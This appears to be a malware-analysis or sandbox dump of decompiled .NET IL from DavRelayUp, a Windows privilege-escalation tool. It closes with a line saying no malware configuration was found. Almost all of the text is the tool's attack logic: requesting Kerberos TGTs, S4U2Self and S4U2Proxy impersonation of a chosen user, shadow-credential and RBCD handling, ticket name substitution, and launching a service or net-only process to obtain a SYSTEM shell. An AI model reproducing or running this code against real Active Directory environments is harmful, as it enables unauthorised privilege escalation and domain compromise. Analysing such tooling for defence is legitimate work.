DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call 
System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_03FF: ldloc.s V_6 ret <null> ldloc.s V_6 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_044E: ldloc.s V_7 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_7 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_8 ldloc.s V_8 brtrue.s IL_047D: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_04E9: ldloc.s V_7 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String 
DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_8 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_8 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String 
System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_071D: ldc.i4 1500 ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.2 <null> bne.un IL_071D: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldsfld System.String DavRelayUp.Options::shadowCredCertificate ldsfld System.String DavRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_14 ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_14 ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) stloc.s V_11 ldloc.s V_11 brtrue.s IL_05C1: ldloc.s V_11 ret <null> ldloc.s V_11 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_0610: ldloc.s V_12 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_12 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_12 ldsfld System.String DavRelayUp.Options::impersonateUser 
ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_13 ldloc.s V_13 brtrue.s IL_063F: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_06AB: ldloc.s V_13 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_13 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_13 ldsfld System.String DavRelayUp.Options::targetSPN ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 call System.Byte[] DavRelayUp.LSA::SubstituteTGSSname(DavRelayUp.KRB_CRED,System.String,System.Boolean,DavRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean 
DavRelayUp.Options::verbose brfalse.s IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0739: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly brfalse IL_07D8: call System.Void DavRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0778: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_15 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s 
IL_079C: ldsfld System.String DavRelayUp.Options::netOnlyCommand ldloc.s V_15 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::netOnlyCommand brfalse.s IL_07CA: ldloc.s V_15 ldstr [*] --NetOnlyCommand override requested call System.Void System.Console::WriteLine(System.String) ldstr [*] To get the SYSTEM shell, run ' ldloc.s V_15 ldstr ' in context of the created process call System.String System.String::Concat(System.String,System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldsfld System.String DavRelayUp.Options::netOnlyCommand stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void DavRelayUp.KrbSCM::Run() ret <null>

No malware configuration was found at this point.